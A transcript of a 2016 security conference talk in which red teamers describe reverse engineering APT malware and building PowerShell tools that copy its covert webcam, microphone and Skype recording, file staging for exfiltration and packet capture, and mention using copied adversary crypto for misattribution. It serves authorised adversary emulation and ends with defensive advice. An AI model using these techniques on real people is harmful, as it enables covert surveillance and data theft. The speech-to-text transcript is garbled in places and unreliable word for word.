
Adversarial Post-Exploitation: Lessons From The Pros

BSides DC · 2016 · 46:57 · 595 views · Published 2016-10
Category: Technical · Team: Red
About this talk
With the recent evolution in red teaming and a shift towards adversary emulation for network assessments, the source of inspiration for offensive tactics, techniques and procedures (TTPs) must change. An offensive force looking to deliver realistic engagements can and should use analysis of adversarial toolkits to better their tradecraft. First, this talk will cover the process of deconstructing real world toolkits for practical analysis and use. To apply the process, this talk will analyze certain post-exploitation features seen in the wild and how adversaries use them to accomplish their malicious objectives. Next, similarities will be drawn between the objectives of the adversary and the objectives of the red team to demonstrate how these novel tradecraft ideas can be beneficial for training as well. Finally, PowerShell code built to emulate the adversary actions will be demoed and released for practical use in engagements.

Justin Warner (Offensive Network Services Lead at Adaptive Threat Division, Veris Group): Justin Warner is a red-teamer and the Offensive Network Services Lead for Veris Group’s Adaptive Threat Division but dabbles in security research when he is feeling inspired. As an Air Force Academy graduate and former USAF Cyber Operations Officer, he gained experience with large scale operations at the national level. Justin has a passion for threat research, reverse engineering, and red team operations. He is a cofounder of the PowerShell Empire project, actively participates on numerous open source projects and is a participant in various red team events in the DC area.

Chris Ross (Penetration Tester at Adaptive Threat Division, Veris Group): Chris Ross currently works in the Adaptive Threat Division at Veris as a penetration tester and red teamer. Chris is an offensive PowerShell advocate and loves developing offensive tools in both PowerShell and Python. He particularly enjoys the challenge of developing capabilities to emulate real world toolkits. Chris is a developer on the EmPyre Mac/Linux post-exploitation toolkit and a contributor to the community across numerous other toolsets.

Thanks to our video sponsors: Antietam Technologies http://antietamtechnologies.com, ClearedJobs.Net http://www.clearedjobs.net, CyberSecJobs.Com http://www.cybersecjobs.com
Transcript [en]

The BSides DC 2016 videos are brought to you by ClearedJobs.Net and CyberSecJobs.com, tools for your next career move, and Antietam Technologies, focusing on advanced cyber detection, analysis and mitigation.

Good morning. Thank you, BSides, for having us and putting this on. Our talk is going to be called Adversarial Post-Exploitation: Lessons From The Pros. We're going to go over a lot of really interesting stuff here today. We're going to focus on a kind of introduction on what adversary emulation is and what red teaming is and how we apply it in the services space; lessons from bad guys, where we're going to go through a bunch of different APT examples and malicious pieces of malware that we found and talk about how we can study them to better emulate bad guys on engagements. We're going to go through each feature at a technical level, go through the reverse engineering of it, what we discovered and how we apply that, as well as a very broad overview of the defense.

I'm Justin Warner, I'm the manager of offensive services here at the Adaptive Threat Division, so I hear a whole bunch of us up here. I'm a former Air Force guy, spent a lot of time in the DoD, about five years, and then I transitioned to the commercial sector where I do consulting now. I'm a Fairfax County volunteer EMT, so if there's any fire rescue volunteers, hi.

Chris: My name is Chris Ross, I've been a part of ATD for just about two years. I'm also involved with EmPyre and I'm a former sysadmin. So, inspiration for this talk: I saw a talk by Richard Wartell a long time ago, a couple years ago at BSides Chicago, and his talk was called "Malware's Hard, Let's Go Shopping", and the generic theme of the talk was diving deep into a supposedly very advanced bad guy's malware sample to look at the different mistakes they make and then how we can learn from them. So I really liked the idea of a mix of a technical talk where you're diving deep into these samples as well as kind of applying the big broad overview, as well as many of the different offensive toolsets that have come out over the past couple years, so Matt Graeber's PowerSploit project, PDF proxy, Meekins, all these different tools that are based on techniques that are being leveraged by real-world bad guys in breach scenarios, and it inspired me to kind of look at what we could do better from the other side. And then lots of red team engagements: in the two years I've been on numerous red team engagements for commercial top Fortune companies, and you learn a lot in each engagement. You kind of take away a different lesson, learning a different skill or technique that was never heard about before, never really been publicized, or a way to do it that's not previously known, and in these engagements you really learn a lot.

So before we go too deep we want to give you a good intro overview about really what we're talking about. So first we have to start with what is an adversary, and that's kind of the other guy on the other side of the playing field. If you're a blue team this is the red team, or for the red team the blue team, or in the real world this is either nation-states or criminals or, you know, kids in a basement, or, you know,

any sort of asymmetric threat that might be out there. Then what is the threat? It's that thing that is the source of the harm, so both source and means, and there's a wide range of different adversaries. So when you talk about red teaming or adversary emulation you're not really just focusing on a super advanced nation-state level threat; that could be one aspect of it. So there's obviously APTs like these guys (notice the middle picture is Matt Graeber, he's APT), and there's also ABTs like these guys, so these are real-world threats to environments. It might be a DDoS, it might be a script kiddie in a basement, but because of the means of warfare or the means of computers these days, it gives them a unique advantage that makes them a real power in an environment.

And so when you talk about adversary emulation, it's a form or subcategory of red teaming, is how I like to think of it. It's a specific kind of red teaming focused on modeling a very realistic, known threat, and so you're utilizing intelligence that is either public or private to model this adversary. You're trying to model both their behaviors and objectives all the way down to their low-level techniques or malware or ways that they do things. There are obviously a lot of benefits to this approach, so you know it's very measurable: you can actually tie your direct actions to something that's been done in the wild, which answers a lot of questions from execs and different decision makers. But also there's some notable weaknesses that are introduced, and so when you're forced to model a specific adversary you risk handcuffing the red team. So part of red teaming is being creative and flexible and learning in the engagement to adapt and change; when you're trying to model an adversary, if you flex and adapt you might deviate from that model or that threat model, in which case you risk kind of straying outside of what you were intending on doing, and so some of these weaknesses are worth noting. It depends on what the end goal or what the objective is in the different engagements.

As there's no real framework for adversary emulation or ways to model adversaries, I kind of like to look at defensive frameworks or tools, so there's something called the Diamond Model, which is essentially a mathematical model; it's used both mathematically as well as kind of in a generic concept, but it basically states that for every intrusion event there's an adversary taking a step towards an intended goal by using a capability with an infrastructure against the victim. So it breaks out and characterizes adversaries into kind of four different components, and so we're going to talk a

lot about tools today, and capabilities and techniques, but there's other aspects of adversary emulation that you have to be aware of when you're actually doing this threat modeling: things like, are you using a similar type of infrastructure or the same infrastructure as them? Not necessarily IP addresses, but let's say they use DigitalOcean during their operations; can you use DigitalOcean? Or adversaries: what adversary are you trying to become, and what victims are you going after with what objectives?

Post-exploitation: I want to make sure I highlight and call this out. This is one of the biggest phases during red team and adversary emulation engagements, and so oftentimes our engagements can be weeks to months to half a year long, and in that case we want to make sure that we are often in the network within the first week, meaning that we're spending four to five months moving around the environment, targeting different objectives and working through different phases. And so post-exploitation is probably the most consequential phase during these engagements. It's where most of the intelligence gathering is conducted, it's where you're actually obtaining and getting your objectives as well as demonstrating that impact and providing the training to different blue team members, which is the ultimate goal of these engagements. It's not just to show they're vulnerable, that's one aspect of it, but it's also to provide training as well as show the risk of a breach in an environment.

Before we go much deeper: we're the dog and the bad guys are the turtle, and so we're going to ride off all the work that they've done, and we're going to heavily focus on stealing their ideas or learning from them so that we don't have to go innovate as often. Innovation can be really awesome; it can be expensive in resources and time and money and researchers. So if you can study a sample or a specific breach analysis, why not just replicate some of the activity you've seen there? Again, relax, somebody's already done the work for you; that's the beauty of being a red teamer.

So when focusing on threat emulation, it really pushes you to understand what's going on underneath these different samples and techniques, and I think as testers we generally have an idea that we practice threat emulation on engagements when really we're modeling ourselves after a general threat. So this is just a general overview of our process for threat emulation, and I'll talk about each of these in the following slides. So where can we see some of this cool stuff? I know myself personally, I like to look at threat reports to find new cool ideas to implement, and also sometimes these reports are more so marketing material than actual technical

documentation, which is unfortunate, but really that's what we're looking for: a detailed sort of map of where we need to go to implement this technique. And then when it comes to analyzing or looking at these samples, you want to lean on the technical documentation that you acquired previously and use that to kind of walk you through the code, or walk you through what you can look at in IDA Pro to find specifically what you're looking for and how to implement it. And I definitely recommend Practical Malware Analysis to anyone who's interested in reverse engineering; it's a great book, there's a lot of hands-on labs and you'll definitely take away something from it. And we won't do this to you: we're not going to show you just a random screenshot of some IDA Pro output and expect you to gain much from it. I think it's really cheesy when companies do that.

So when looking at alternatives, the great thing is that there's almost always a POC or some open source project that is available on GitHub or Rohit Labs or somewhere else for you to use as a base for your project for development. I think that's a great thing and it allows you to quickly or rapidly develop your POC for the technique you want to implement. So when it comes to implementation, I think the level of difficulty depends on how well you want to replicate what this threat was doing, or what this group was doing in their technique: whether you want to definitely focus on true threat replication, or you want to take what they did and sort of modify it and apply it to a general or generic solution. And definitely you want to live off the land, and that's what brings us to why we love PowerShell so much. I think nowadays whenever you see a new tool release, nine times out of ten you can say it was implemented in PowerShell, and for me the biggest benefits are just direct access to the Windows API and that it's installed by default on Windows 7 and above.

And just a little disclaimer: all these tools that we've written are strictly POC and we don't really plan on providing active support for some of them after this talk, so we're going to ignore your GitHub issues. Make sure you understand the code, use it at your own risk, and even contribute if you can. So I'm going to go back; it's a huge pet peeve. The screenshot at the bottom is someone running code right off of GitHub. Don't do that; know your code, or else we'll put message boxes in them so you get popups on every op you use. We've totally not done that.

So the first example we're going to cover was inspired by an adversary, or a tool that we saw going around. A

lot of the old-school Trojans you've seen running around, things from the late 90s or early 2000s: it's all the rage to get webcam and microphone access, right? Like that's the sexiest thing you can do, is access someone's webcam and take a snapshot of them. You get this really juicy picture of them playing WoW or something; it's really impressive. Now you might think it's kind of silly, because you're like, well, what value does that actually have to a sophisticated adversary? But there's a lot of intelligence that can be gained or learned from a microphone recording of you, depending on what time or where you're at, as well as the webcam image.

So we start by kind of looking at these examples. The example we're going to dive into for the microphone recording is called Luxnet RAT. It's an old-school Trojan similar to, you know, Sub7 or Back Orifice, was running around, very commodity in its nature, but it provided the ability to issue commands to a multimedia interface which allowed you to kind of dump WAV files and gain control of the microphone, which we'll dive into a little bit deeper. And then for the webcam-specific capability we're going to dive into an adversary known as Rocket Kitten. They have a tool called MPK shell, which is kind of their lightweight backdoor, very very simple in nature; however it uses a set of API calls called VFW, Video for Windows, to access and control the webcam, that we're going to dive deep into.

So for MCI, basically what the malware sample did: when you tore apart Luxnet and when you looked at it, essentially the bad guys controlling it were simply sending commands to something called the Multimedia Command Interface. It's basically an abstraction layer over all the different devices that your computer uses. Most people don't even know it's there; it's built into Windows, it's built to help developers or programmers control those different devices, and so by simply sending command strings to that abstraction layer it'll handle the back-end control of the devices for you. You don't need to do anything device-specific or independent. So when we were looking on an engagement one time, we were like, hey, we think it would be really cool to both demo this to the customer as well as see what we can gain by utilizing microphone capture. Got approvals, went through everything, we developed this capability that used this technique, and so it would send individual strings to that abstraction layer to essentially drop a recording WAV file to disk and then allow you to download it and close the recording. Very simple, requires like four different API calls to do, and very little chance of error here, as the abstraction layer is going to handle any faults or errors for you.

As far as the video capability with Rocket Kitten, what they were doing is they were essentially using the VFW libraries inside of Windows to control a capture window, and so they would instantiate a capture window on the system, and then they would send commands to that capture window to get the drivers, get the description, and issue a recording in that hidden capture window, and then they would disconnect the driver, and that would result in a recording being written out to disk. And now we're going to talk about how much that hurt us going forward. So when researching alternatives for the video

stuff, it was really easy to find. We went to Microsoft's website, we're like, what else is there? There has to be more native capability to access these different devices, and one of the first things we see is "many of its features have been superseded by DirectX." It's like, oh dang it, Rocket Kitten, they're using old-school, superseded capabilities, and we'll show you why. But essentially the biggest alternative was just use DirectX; it's built for this very reason and there's a whole bunch of libraries and support in different languages, and so we considered that. For audio we analyzed a lot of different tools, so when I was going through all this commodity malware, it's like the least fun thing for reverse engineers, to sit and stare at commodity malware all day, and I spent about two days going through different samples hoping to find some different method of doing microphone capture. Unfortunately the majority of them use the Windows multimedia library, winmm, or MCI, and so I didn't really find other ways, although DirectX and other methods we've considered would be just as usable.

So the resulting capability, and the big picture takeaway for us, was on that op where we actually ran into this situation, we were able to mock up this capability we call Get-MicrophoneAudio in PowerShell. It's actually supported in the PowerSploit dev branch, so this is one that will be supported unlike most of the others, and it used winmm MCI to issue these calls and dumped a WAV file to disk. The big picture takeaway is we were able to take this Luxnet RAT, which we studied in depth, reverse engineered it, figured out how they did it, and then directly mock it up for use during a red team engagement. So when the customer says, you know, you guys were dumping audio from disk, how are you doing that, or why were you doing that, you could cite and tell them, let them know that you were emulating a real bad guy that does this in the wild.

In this case you might wonder, what does audio get you? Well, when you're sitting in a call center, or you're targeting a call center or a network operations center or a security operations center, and they're handling trouble tickets or various different kinds of customer support, or, I don't know, administering systems, audio gets you a lot. You can hear a lot of really juicy details and you can learn a lot about the network by listening to voices rather than relying on pure IP addresses and scans and Nessus and all the different types of telemetry that penetration testers and red teamers are used to. The really big downside of this capability is that there is no

compression, wah-wah. So when you're using winmm MCI and you're dumping these WAV files, they are giant, and so if you're working under strict operational security concerns: it's not encrypted, it's a WAV file on disk, and they're rather large, and so you're going to chunk it up and exfil it out, potentially in a little bit stealthier way than if you were to get good compression or MP4 or some other method.

For the Rocket Kitten mock-up, we had a lot of fun with this one. I spent a lot of time playing with their MPK shell on a dev system and I built a logically similar mock-up, and so I actually got it to the point where it was the exact APIs called in the exact order that the adversary toolkit was, with the exact flags and arguments and everything, you know, almost a line-for-line replication in PowerShell of what their toolkit did. But every time I ran it I would get a pop-up as the user, which is not the goal of a red teamer, by the way, to get a user pop-up, and it would always ask me to select the device, and I'm like, man, maybe this is why Microsoft superseded this. It turns out that VFW, when you're using a VM with a generic driver that handles all of that different multimedia including your camera, VFW doesn't know what device to use, and even when trying to specify it, it doesn't take it real well. So either I'm a really bad programmer or I just couldn't figure it out, and the Rocket Kitten actors didn't figure it out either, because after playing with their toolkit enough I realized it did the exact same thing, caused a giant user pop-up. And so I put this out on GitHub for release; the GitHub is going to be dropped right after the talk so you can see these different samples, but I don't recommend using this in a real-world engagement.

Instead use this one: so we went with Microsoft's advice after failing at the VFW stuff, we went ahead and we found .NET assemblies that already implemented DirectShow and DirectX capability, so all credit goes to those authors cited here under different licenses, but we embedded those into our tool, which allowed us to gain that DirectX support straight up in our tool, and so we can use both compression and video tuning with proper frame rates, and we can open up the webcam and audio for capture in a very stealthy manner. Now, the light does turn on, so that's a good indicator of compromise if your video light is turning on randomly, but you'd be surprised how many places we've used it with no help desk ticket being submitted. So now the big takeaway for adversary emulation in this case is the actors:

what are they using webcams for? Well, they're using it to capture, I don't know, maybe who is at the other end of that keyboard, what are they doing, where do they live, is this a residential purchase, is this a commercial building. For us personally it works really well in SOCs; again, you hear me talking about SOCs a lot. These capabilities work well: it's nice if you're on a laptop that just happens to be facing the wall of SIEMs, like that's always displayed in every operations center up on the wall, and you can get a nice picture screenshot of all the SIEMs in the background. It gives you a pretty good preview of all their technology as well as any alerts that are at the top of the list there, Jira tickets and everything else that's pretty juicy. This tool has been put out on his GitHub for random PowerShell scripts and we're going to show a quick demo of it. So this tool, or this demo, is going to run for you; let's see, ooh, escape the mood.

Two clues, there it is.

Alright, so the first function we're going to run here, the first part of this, is just kind of showing the ability to query the end user system. So you can see here we're able to query and get the different audio inputs that are available on the system, we're able to get the different compression methods that are available on the system, and so this would allow you to be very granular and fine-tune exactly what compression and tools your video and audio is going to record with. So in this case you can see we have a USB video device and a microphone attached, as well as different compression methods that are available to the actor. And so obviously this is a proof of concept, we're not showing you in a weaponized manner, we're in a PowerShell prompt; again, not probably ideal if you're red teaming straight up, like RDPing in or anything, but this is all usable and friendly to, name your, you know, hacker tool that you like to use: Cobalt Strike, Core, Metasploit.

So in this case we're going to record a webcam video. It's going to be a record time of four, so four seconds, with a video compression, and we're going to add a compression to it as well to kind of keep the size as minimal as possible, and then we're going to slap on -Verbose because I like to see output for everything. And when it runs it's going to set all the frame rates for the capture and start it. So at this point the light would be on, it's capturing video from the end user, and that returns the file object that it's written to out on disk, and so at this point you could, as the adversary, begin to chunk up and exfil this, or if it's small enough, which in this case it's a fair size, we could just exfil it directly. So just to show you and prove it, we're going to see Chris Ross's pretty face here in a second.

Yay. And so you can see that we were able to record the webcam in a very similar technique, obviously adapted, because in this case we decided that the alternatives were better than the pure threat emulation approach that we could have taken in the previous examples.

Okay, with Skype: so earlier this year, I think in February, Palo Alto released a report giving a detailed account of the T9000 malware sample, and they basically described one of the capabilities that they had to record Skype conversations and also take screenshots during the Skype call. That really piqued my interest; I thought that'd be something really cool to implement in PowerShell and work on as a project. So how did it go about recording conversations? First it would start with using the Windows messaging API to send a broadcast message called API Discover to all the windows present on the system, and Skype would respond to that and indicate that it was running, you know, it's here, and then the malware would send another message saying API Attach, requesting access to the Skype desktop API, and this is when the user will receive the warning, the little orange box you see up there, a prompt saying that there's a process trying to gain access to Skype, and unfortunately there's no way around this, but users are not the brightest people, so they're probably going to click Allow Access anyway.

But once you are allowed access you'll start to see a flurry of messages from Skype on any conceivable screenshot; Skype is pretty robust, verbose with its output. So mainly, while Skype is running, the malware sample was looking for a "call status ringing" message, and once it received that it would send a message to retrieve the user handle of the other call participant, and then it would move on and wait for a "call status in progress" message, and it would instruct Skype to redirect the microphone and audio output to a file on disk, and then it would just run in a loop until the call status indicated that it was finished, and then it would just record the call log. So that brought about the Skype recorder tool that we developed. This was definitely something interesting for me to work on; it's a little challenging because this is my first time developing using .NET reflection in PowerShell, and the entire purpose of this is strictly just intelligence collection, like if we're able to hook some of these Skype calls and listen in on a conference or meeting minutes, maybe we learn some more information about our environment. So I'll move on to a quick demo.

So we see here we import the Skype recorder module and then we're going to start recording with a duration of 1 minute, and you'll see it creates a window, has a window handle, and during that time it will go ahead and send messages to connect to Skype, and we're going to go ahead and start a call with our buddy Echo, the Skype test service, and then once we receive a "call status ringing" and then "call status in progress", it's going to go ahead and try to redirect output to a file, and you'll see there that Skype echoes back and tells you that the output has been set to the file that you specified, and then while the call is in progress it will give you the message about the duration of the call, and then once the call is finished it will wait until the timeout loop is reached to output the location of the files. And there's also some logic built into the tool where if you set the timeout loop to, say, one minute and the call lasts 45 minutes, it'll keep on recording until the call is finished.

So this is really, really useful. I've seen this really useful on engagements in commercial entities that use Skype; there are numerous of them that actually use Skype for conference calls as well as internal messaging. So, you know, in that specific case we walked in, we weren't weaponized, we weren't ready for anything with Skype. There's not too many tools that do this in the red team space, and so again, drawing inspiration from the bad guys in order to kind of solve a challenge or overcome an obstacle, as well as in this case being able to directly quote or cite the APT that they were working. So almost every red team engagement I've

been in, and especially on the first one, I was working with Will Schroeder, another red teamer at the company, and I walk in and there's a couple of things he tells me to do on our very first red team. He tells me to do it by hand, which is like, I hate doing things by hand; hackers are all about hacking and automation. So the first thing he tells me to do by hand: map all the domain trusts in this environment, and there's like 150 domain trusts all in a CSV, and he's like, exploit this. Like, fine, I'm not going to do that, I'm going to write something to automate that. The next thing we have to do is just sit and mine file shares endlessly. Every red teamer knows that feeling of just looking through dozens if not hundreds of file shares in an environment trying to find that one file that's either going to give you your escalation path or it's going to be the crown jewels just sitting unprotected in a file share, ready for the stealing, ready for you to highlight for that customer. So in this case I was like, why do we have to sit and look at file shares, and why do I have to do this every day to detect changes? There has to be a better way to do this.

And so for this specific case, APT30 or Naikon, they're a really solid actor, lots of reporting and documentation on them, which makes them a really good case study for threat emulation. They have a piece of malware called the FLASHFLOOD malware, which is essentially their host profiler, or their ability to survey a system and package up a whole bunch of preliminary data for exfiltration from the environment. And so essentially how it works is it uses timestamps to measure changes in an environment, and anything that changes in certain monitored directories automatically gets exfilled out to this extra directory and encrypted, AKA obfuscated, using some custom routine that's really, really bad and easy to fix. The things that it specifically gathers is the Windows Address Book, certain LNK files, anything from removable media, anything from the desktop, temporary internet files; it's all the normal stuff that pen testers and red teamers and adversaries are looking at every time they get on a box to try to look for interesting things.

And so when you dive down specifically to the monitoring and exfil component, how it works: they use an API called FindFirstFileA, which essentially gives you a pointer to a linked list of all the files in a certain directory, and then they iterate over every file, and every file they get to, they compare a file time to see if that file time is newer than the last time that their tool ran, which is stored

in some text file on the back end if it is it'll automatically archived it so it'll right up wrap it up in its custom in compression routine or custom off you skating routine and ex roll it out to this windows / files directory or recent files directory depending on what it is and then what and then it will it continue iterating over then the actor will return take everything in this office cated directory swipe it up take it out and remove it now the benefit here is is most pen testers and red teamers when they're on an engagement including us like you just maintain access to whatever systems you'd ask the soon use keep them calling home right

like if you get if you got on a new system you don't kill your agents every hour and you don't only do like 30 minutes of ops and clean off and leave it but when you're operating with operational security concerns so in some of our tightest read times we have to be very careful about where we leave agents and how long we're on the system and we have to be very selective and where we move throughout the network so in this case running a tool like this leaving it behind and then coming back to get your exfil later is a much better solution that allows you to maintain a more covert pressing presence in the

environment so when looking at different alternate techniques I like all the asynchronous options because like sitting there and just constantly iterating over and some time to manner seems kind of silly for me like there's this holy venting thing built into windows just is made for this but so there's the win32 API which exposes the fine first change notification API call that allows you to set up asynchronous events to watch for stuff like this or in.net since we're cheating or using powershell and.net there's the system diode a file watcher class or all system watcher class which will essentially monitor and fire some callback function every time there's a change in the file system in a specific location there's

also wmi events and then as far as acceleration or compression there's all sorts of options we specifically mentioned the script here i'll tak encrypted store it's a really really good option for saving off and encrypting or exfiltrating data it basically takes everything going into it encrypts it using AES or RSA and stores it kind of like a virtual file system so it's kind of like a VFS on a system so the in tool that we came up with really good for file shares we we utilize the previously written sit starts file system monitor tool with some slight tweaks in this case that we were using this tool on an engagement we were specifically asked to emulate a threat

so they wanted us to to try to model this specific our Terry so apt 30 and so in this case we we created a tool set and we created an encryption routine called right dash flash flood file which it takes in any file off the pipeline or any byte string off the pipeline and outputs it to the proper location with the proper iocs with the exact crypto routine the apt 30 is using so there's obviously numerous cases or use cases for this there's adversary emulation there's I don't know maybe misattribution or malware myth distribution maybe if you're trying to blame somebody else for your work if you encrypt all your stuff exactly like them and put it in the same places then

oftentimes analysts will jump to conclusions that's a pretty good a good use for this as well as just up you know obfuscating things on disk again this is their routine is like a very simple like add shift little kung flute confused so I don't I don't recommend actually using this on an engagement unless authorized by your customer it's much better to dump things that disk encrypted AES RSA so it's not going to be picked up especially if it's anything sensitive but again makes a good use case or demo in the case that you're trying to show the effects of a bad guy in the environment so let's see if we can find it here so we're going to load up our tool to

start file system monitor this has been tweet from the version that's on guests you be specific for our thread emulation scenario here and then we're going to start monitoring this really secretive recalled I hey I hide things on my desktop because by the way all the directories we see in real engagements are about that obvious now you notice there's nothing in here yet so the users just set this up and but they have a text file that they've written a note pad with all their super-secret data banking passwords and passwords of Pandora and everything else that they always store in the desktop so we're going to start our monitoring script and the user is going to be really lame and

drop their password text file and you'll notice that instantly they synchronous event fires which notice is that what's been created and it exel traits it obvious cated out to the exact directory that that apt 30 did so if you come to that directory you'll notice the files there we're going to open it up and show that it's not exactly plaintext it's a nice random byte string that doesn't make any sense then as the bad guy or the red team or whoever we are we would come back and pick up this file actual trade it which would be all their sensitive passwords and then we can read it because we're the ones who wrote the encryption

routine and so we can output all of their secretive data that we swiped off without them noticing so real time this would get everything that they add even if they delete it so if they instantly add it like a tent file or oh man I need to just write this password down real quick and they delete it because they're really secure against bad guys and they're aware of what they're doing this would swipe it it's a race condition so depends on if you can beat the milliseconds of asynchronous eventing but I'd like to bet on Microsoft on that one a couple times out of 10 alright

So for packet capture, I think that's one of the most useful post-exploitation capabilities that you can have when operating in an environment. There are a lot of different attacks that use packet capture as a base to conduct the attack. For one, WSUS man-in-the-middle; I think that's a really cool technique. Just being able to inject the payload into a WSUS update and have it pushed to a remote host is pretty amazing. Also, there are several APT groups that make use of packet capture for different techniques they implement. For one, Duqu loved to drop the WinPcap driver on, do a hot install, and use a virtual file system to inject mDNS replies.

So how WinPcap works: usually it's a pretty dirty installation. You'll have to drop all the required DLLs and also the required driver, and use sc to create a service and start that service for WinPcap, and then you'll be able to utilize all the WinPcap functions to capture traffic to your heart's desire.

So what other research is out there? For one, Inveigh; it's a tool written by Kevin Robertson. It's a great tool for spoofing attacks, specifically WPAD spoofing attacks. It uses raw sockets to capture traffic and respond to SMB or DNS or NetBIOS requests. And then also there's some work done by Alex Rymdeko, or killswitch-GUI; he wrote a pure packet capture in C++ inside of a reflective DLL, so it's pretty great work.

Another thing I've seen a lot of when reversing all these different samples: one of the favorite techniques that I saw implemented by different actors in different reports was Windows Filtering Platform drivers, which is essentially a driver that's supposed to be a middle abstraction layer that you can install. It does require code signing, but we've all seen that code-signing certificates get stolen, and so if these actors are able to get their hands on one, they can sign their own driver that is built to basically intercept network packets, network packet capture. The other one is ETW, a little-known feature inside of Windows. It's built for event tracing; it's meant for debugging and administration, but it exposes a huge amount of functionality to access back-end data on a system, including network traces. So you can actually, to some degree, record and store off network traces all using a native, built-in tool in the environment.

So that's what brought about Get-WinPcapCapture, the PowerShell tool. It utilizes some .NET libraries to craft packets and conduct packet capture. It also takes care of the hot install of the WinPcap drivers, and also uninstall. You can set the size limit for the amount of data, or packets, you want to capture, and also a timeout. So then I'll move to a quick demo.

So you see here, first we're checking to see if the npf service is installed, and it's not, so we'll go ahead and use the tool. We'll import WinPcapCapture and install the WinPcap drivers. Currently it uses sc.exe to create and install the service; we have plans in the future to change that to use pure .NET reflection. Then once it's set up, we can use the main function, Get-WinPcapCapture, and we're going to capture on port 80 and set the max size to 25 megs. And then we're going to capture over a plaintext protocol: someone logging into a website, which is pretty awesome, totally not a vulnerability. I got approval for this. Once it's finished, it will output the location of the pcap file. You can use the same script to uninstall the npf service and clean up, and then we can just go ahead and open up that file with Wireshark, and then we see the cleartext login for the site.

That's his face again. Yes. So I'd like to also note on this one that I've seen the most use out of something like this in a lot of finance and industry. You know, there's a lot of regulatory protocols that control the use of plaintext protocols, but you'll note that a lot of those protocols, or a lot of the specific compliance things, are about traffic over the boundary, or things leaving the environment. However, there's this thing where bad guys get inside your environment, and they don't need the boundary anymore. And so if there are situations, or systems, or credit processing, or financial processing, or core banking, or any of those other really good buzzwords, that utilize plaintext protocols, this is a really good method to directly rip off of a bad guy to dump those financial transactions just cleartext into a pcap and prove access to that data, all without having to get on the mainframes, which I hate touching anyway and stay far away from.

So we kind of feel it's an obligation; we try very hard to give mitigations or defensive talk on everything we do, because, you know, our job as red teamers especially is to help better and train and improve the state of the industry, and to try to offer suggestions. Is the world ending? No. I would say it is very, very hard to find a trick or a mitigation for a lot of these different post-exploitation activities. In each of these cases there are indicators, and things that could have been locked down to prevent this from occurring. However, I would say that it's kind of the focus, oftentimes, when we release these tools: we come up here and we do this talk, and we show you everything in PowerShell, right? The number one thing we get after a talk like this is, "I'm deleting PowerShell from my environment." Don't let our proofs of concept trick you; this can all be done in native code too, and this can all be done with built-in tools. So we don't want you to think that PowerShell is the enemy.

I would say the core thing here, the issue, is, in the words of a very, very wise senior red teamer, Matt Nelson: users are going to use. And so most often what adversaries are exploiting is that user. They're using user behavior, and they're using admin behavior, in situations where they're supposed to be able to do it. The real focus should be on auditing and detection, because after an adversary gets admin in your environment and they're doing admin things, oftentimes the thing that's going to tip you off is admin things that don't normally happen in your environment. Let's say the admin normally takes a two-hour lunch, and instead of his two-hour lunch it looks like he's working through lunch; maybe you should ask the question why. Or, I don't know, if they're logging in at two in the morning from a VPN, or any number of things. Every time you read a breach report you're like, how did no one notice this? This is very odd behavior. But, you know, it's easy in hindsight, 20/20. The auditing and real-time capture of all this, kind of the industry best practices, are going to help you. One of the best blogs I like to recommend, and I absolutely love this post, I think it's extremely underrated, is "Maslow's Hierarchy of Security Controls," written by Lee Holmes of Microsoft.

Basically the concept is, if you're installing like 15 next-gen agents to solve all the security in your network, but you don't have AV or whitelisting, maybe you should take a step back. Maybe you should build a foundation of your network security and defense in the right order, and step it up in an appropriate manner. Focus on the basics first: the basics of detection. Have a SOC; have a team that's trained to respond; and then you can start installing the tools that will empower that team to do their job.

We often get asked about the new buzzword; the new favorite thing to say is threat hunting, right? Everyone's heard it: we want to hunt, we want to hunt in our environment. And that's awesome; I'm actually a big fan of it. I kind of go back to, or boil this down to, a very simple principle: Locard's exchange principle. Essentially it's a traditional forensics principle that's been applied to digital forensics as well. It essentially says every contact leaves a trace. There's always trace evidence every time an actor enters your environment, no matter how sexy and sophisticated they are, no matter how many billions of dollars they spent on a tool. There is an artifact left somewhere; it's impossible not to leave an artifact somewhere. However, the trick is, are you looking for the artifacts? Right? So that's essentially what threat hunting is: going to proactively look for and identify artifacts. And so I'm a big fan of it. I think if it's applied in the right way, and it's focused on the people aspect, not just installing a bunch of tools that do things, but trained analysts that use those tools and know how to organize an engagement, I think it'll be very helpful. The majority of times we've been caught on an engagement (yes, we get caught, that's the job of the red team), the majority of times we've been caught it's either users, because we do something really bad and they notice, or we intend to get caught, or it's people that are being proactive. They're digging through SIEM data because they enjoy their job, and while digging through SIEM data they notice something odd, versus just sitting and waiting for the big giant red alert, like a nuclear alarm, to go off in the SOC, which, you know, rarely happens with an adversary that knows the environment.

So what are the big takeaways from here? Well, hopefully some really cool tools you can go play with, and some ideas. Realistic threat replication must model threats. A lot of people say they do threat replication, but are you really? Are you modeling a generic threat, or are you modeling a specific threat, or have you even asked that question? Because when you start talking about applying the appropriate level of threat for the environment, it doesn't always mean being super advanced APT; sometimes it means modeling a ransomware threat to see how the environment would respond. Now, all of the threat replication relies on realistic tactics and intel and observed techniques, which is the hard part in this industry, because it's so hard to get your hands on a detailed post-mortem analysis of the majority of breaches. One of my favorite talks was "No Easy Breach," I think is what it was titled; it was given at DerbyCon, and it was essentially a walkthrough from Mandiant of how they did this giant IR, and it was like a major battle back and forth with this adversary trying to fight for control in an environment. It's a really great post-mortem for people to be able to learn how to replicate those threats.

There are plenty of creative things. So all of you who have used screenshots and keyloggers and that's it on your engagements, think outside the box. There are so many different things you can do to collect intel from a user that are powerful beyond those two simple techniques. So expand your horizons, get creative, go out and study bad guys and how they're doing it, and then go create that. And then my favorite line, and I always tell our new guys this, is: OPSEC is never perfect. I shouldn't even say "rarely." So that trace evidence that you're going to leave behind as a bad guy: both understand what you're leaving behind, and for the blue teamers, understand what the bad guys leave behind. So red needs to learn a little bit of blue, and blue needs to learn a little bit of red, to better everybody's skill sets.

So we've got a bunch of malware references. We're going to put these slides up on SlideShare and release them, but there's a bunch of my references for the specific hashes and reports that we talked about in here, if you want to check out how we modeled it or how close it was. So these are kind of reference material at this point. Open up for questions; I think we have about five minutes, and then we'll be out back. We have a table out back, and we'll be around for any other questions. Go ahead.

